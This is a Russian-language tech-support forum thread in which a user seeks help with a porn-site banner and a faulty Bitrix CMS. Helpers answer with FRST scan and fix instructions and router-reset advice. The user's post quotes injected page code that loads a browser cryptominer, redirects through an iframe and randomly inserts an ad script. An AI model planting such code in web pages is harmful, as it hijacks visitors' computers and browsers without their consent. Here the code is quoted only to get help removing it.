Перейти к содержанию

Высплывающее окно Bonga Cams в браузере + консоль рабочего сайта работает со сбоями


Жанна Байкова

Рекомендуемые сообщения

Добрый день!
 
У меня возникла проблема на рабочем компьютере: на некоторых страницах в Chrome появляется баннер порно-портала BongaCams. Примечательно, что такой баннер появляется в браузерах и у моих коллег.
 
Из-за браузерного вируса с перебоями работает CMS 1С Битрикс, через которую я размещаю материалы на корпоративном сайте. Сайт иногда работает некорректно: при нажатии на кнопку или ссылку может перебросить в другой раздел. Если нажать Ctrl+U, иногда появляется следующий код:
 

 

<html>
<head>
  <script src="https://xmr.omine.org/assets/v7.js"></script>
  <script>
    OMINEId("f6c7f38e473a4a0a9d9d1f340cb260a3","-1");
    throttleMiner=30;
  </script> 
</head>
<body>
  <div >
     <iframe src="http://www.r-id.ru/"width="100%" height="100%" id="demo_frame" scrolling="no" frameborder="0"></iframe>
  </div>
<script>
  var i = document.getElementById('demo_frame');
  var t; 
 
  function d() {
    if (navigator.appName=="Opera") {
      i.src = "http://www.r-id.ru//"
    }
    clearInterval(t);
    t = setInterval("m()",1000);
  }    
   
  function m() {
                var c = i.contentWindow || i.contentDocument;
                var newheight = c.document.body.scrollHeight;
                if (i.height != newheight) {i.height = newheight};
  }
  
  onload = d;
  onerror = function() {window.location.href = "http://www.r-id.ru/";}; 
  i.onerror = function() {window.location.href = "http://www.r-id.ru/";}
 
  if(Math.random()<0.1) {document.write("<script id='IM_JS' type='text\/javascript' src='https:\/\/promo-bc.com\/promo.php?c=616369&type=im&size=160x320&name=opc'><\/script>");}
 
</script>
 
</body>
</html>

 


 
Если перейти по ссылке [ссылка] из кода страницы, то попадаешь на сайт майнеров.
 
Консоль работает со сбоями: я не всегда могу загрузить картинку, некоторые функции не работают, иногда процесс работы не сохраняется при нажатии, приходится делать все заново. Поэтому прежде чем сохранять материал, приходится копировать код.
 
Обратилась за помощью к разработчикам сайта. Они проверили код сайта, работу консоли и со своей стороны ничего не нашли.
 
Открывала сайт на домашнем компьютере, консоль работала исправно.
 
Тогда на рабочем компьютере я запустила проверку с помощью Kaspersky Endpoint Security для Windows 11.0.0.6499. Антивирус не выявил ничего. 
 
После этого я установила Malwarebytes AdwCleaner. После чистки консоль начала время от времени работать (с переменным успехом), однако баннер BongaCams все еще всплывает в Chrome. Я опробовала работать в CMS Битрикс в других баузерах - там консоль так же работает с переменным успехом (то нормально, то сбоит).
 
Я позвала на помощь нашего сотрудника технического отдела, который по совместительству еще иногда исполняет обязанности сисадмина. Он удалил некоторые программы, которые я не использую, но проблему это решить не помогло.
 
После этого я установила Чистилку: https://chistilka.com/
 
Утилита пометила файл ecf00c38dc807e105d881c433a6b455dd2c606b6, который находится в C:\ProgramData, как подозрительный. Увы, для продолжения работы программа требует платной подписки, поэтому дальше я ничего с этим файлом сделать не могу. Решила погуглить, что это за файл, но так и не поняла, является ли он действительно вредоносным или нет, удалять его пока не стала.
 
Логи, первую и последнюю проверку AdwCleaner прикрепляю к теме.
 
Надеюсь, что Ваши специалисты помогут мне наконец решить проблему.
 
Заранее большое спасибо!

CollectionLog-2019.02.12-12.04.zip

AdwCleanerS05.txt

AdwCleanerS00.txt

Изменено пользователем Sandor
Убрал ссылку
Ссылка на комментарий
Поделиться на другие сайты

Здравствуйте!

 

для продолжения работы программа требует платной подписки

Вот и удалите её.

 

Также очистите следы от прежней установки Avast - Чистка системы после некорректного удаления антивируса.

 

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.

Когда программа запустится, нажмите Yes для соглашения с предупреждением.

 

Нажмите кнопку Scan.

После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

Подробнее читайте в этом руководстве.

Ссылка на комментарий
Поделиться на другие сайты

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:

    Start::
    CreateRestorePoint:
    GroupPolicy: Restriction ? <==== ATTENTION
    GroupPolicy\User: Restriction ? <==== ATTENTION
    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    Task: {8694C82A-F8B2-47A1-9F17-3615116D7674} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe (AVAST Software s.r.o. -> AVAST Software)
    AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`28hfm [0]
    AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0]
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

 

Подробнее читайте в этом руководстве.

 

 

Примечательно, что такой баннер появляется в браузерах и у моих коллег

Вы с коллегами к сети подключены через роутер?
Ссылка на комментарий
Поделиться на другие сайты

Вы с коллегами к сети подключены через роутер?

 

 

Как объяснил мне наш сисадмин, мы все подключены к двум коммутаторам (кроме беспроводных клиентов), а оба коммутатора подключены к роутеру (который также является четырёхпортовым коммутатором, который не используется, и точкой доступа, к которой подключена часть беспроводных клиентов).

 

Благодарю Вас за инструкции, надеюсь, все получится.

 

Текст без проблем копируется с помощью Ctrl+C ;) Я не настолько ламер..)

Прикрепляю фикс-лог.

Fixlog.txt

Изменено пользователем Bigudi69
Ссылка на комментарий
Поделиться на другие сайты

Увы, проблема осталась: баннеры все еще появляются и CMS-ка по-прежнему работает с перебоями... В общем, пока не сработало.

post-52984-0-97411300-1550153702_thumb.jpg

Изменено пользователем Bigudi69
Ссылка на комментарий
Поделиться на другие сайты

Тот, кто имеет доступ к роутеру, пусть проверит его настройки или проделает следующее:

Сделайте аппаратный сброс настроек роутера на заводские, введите правильные настройки, смените пароль на вход в настройки роутера на сложный.

 

После этого вам нужно очистить кеш и куки всех браузеров.

Изменено пользователем Sandor
Ссылка на комментарий
Поделиться на другие сайты

пусть проверит его настройки

Скорее всего некоторые из них (конкретно DNS) указаны неверно. Это ведь ему не должно быть сложно сделать.
Ссылка на комментарий
Поделиться на другие сайты

Сисадмин сообщает, что ошибок быть здесь не может. В нашем случае DNS-сервер поставляется провайдером, прописан на DHCP-сервере и раздается всем DHCP-клиентам. Статические маршруты в системном реестре проверены.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • para87
      От para87
      браузер Google Chrome  не всегда бывает  сам пытается перейти на сайт (byruthub.org   не надо на него переходить)  . Касперский останавливает переход на этот сайт.  
      я скачал   AV block remover (AVbr) v.4 подумал манер  тут safezone.cc запустил пишет скачайте новую версию. Его лог.  Я попробовал переименовал или  в другой место переместить  тоже самое.  Версия вроде новая.
      Malwarebytes обнаружила PUP.Optional.BundleInstaller я не чего с ними не делал лог вот 
       
      CollectionLog-2024.09.26-17.54.zip AV_block_remove_2024.09.26-18.07.log
      Malwarebytes Отчет о проверке 2024-09-26 182543.txt
    • Heishi
      От Heishi
      Доброго времени суток, у меня такая проблема что иногда время от времени, у меня выделяются вкладки в браузере фаер фокс и все программы на рабочем столе при нажатии на ПКМ, еще не будет работать клавиатура, и если зажать сочетание клавиш альт + таб то переходить из программы в программу будет не слева на право как обычно а наоборот, и если отпустить альт и таб то я все еще буду находиться в переходе меж программами, если нажать на программу на панели задач то она не откроется а будет открыта в фоне еще одна такая же программа, а если нажать ПКМ то программа закроется а потом опять откроется, еще после всего этого хаоса у меня открывается майкрософт офис и вылезает окно с путем который ведет к программе онедрайв екзе (вот при написании этой темы у меня снова произошла эта история но на этот раз онедрайва с офисом не было странно), я уже и виндовс переустановил все равно не помогло виндовс 11 ПРО у меня если что( Помогите пожалуйста.
    • kkid
      От kkid
      Впервые такая проблема. Прогнал через  Dr.Web Curelt! и ничего не выявилось. Пытался закрыть через дерево процессоров в том же диспетчере задач ничего не вышло. Попробовал удалить по инструкции трёх годовалой давности в которой точно такая же проблема. Но, ничего не помогло. Скрины и логи приложил свежие.



      CollectionLog-2024.08.02-10.26.zip
    • a1zrox
      От a1zrox
      Пытался и через DiskUnlocker(GUI) пишет на C неверный дескриптор а на E отказано в доступе
      А через проводник запускается все норм
      Скриншот когда пытаюсь открыть ярлык
      а вообще я хотел скачать касперский free не качался чекал сказали чекнуть с помощью KVRT он нашел там нужное мне все а трояны там и все такое удалил а то что нужное пропустил комп перезагружал 2 дня такая проблема на скриншоте пытаюсь открыть ярлык который привязан к приложению с диска E
    • zyablik
      От zyablik
      Сайт учреждения работает на wordpress'е. Группы фото выдаются в прокрутке (стрелки вперед-назад) благодаря плагину NetGen Gallery. Подняли SSL, перешли на https. Теперь каждое фото приходится открывать отдельно. Т.е. смысл плагина пропал. Это как-то может быть связано с https. Или сам плагин перестал работать (в связи или без связи)...
      Спасибо.
×
×
  • Создать...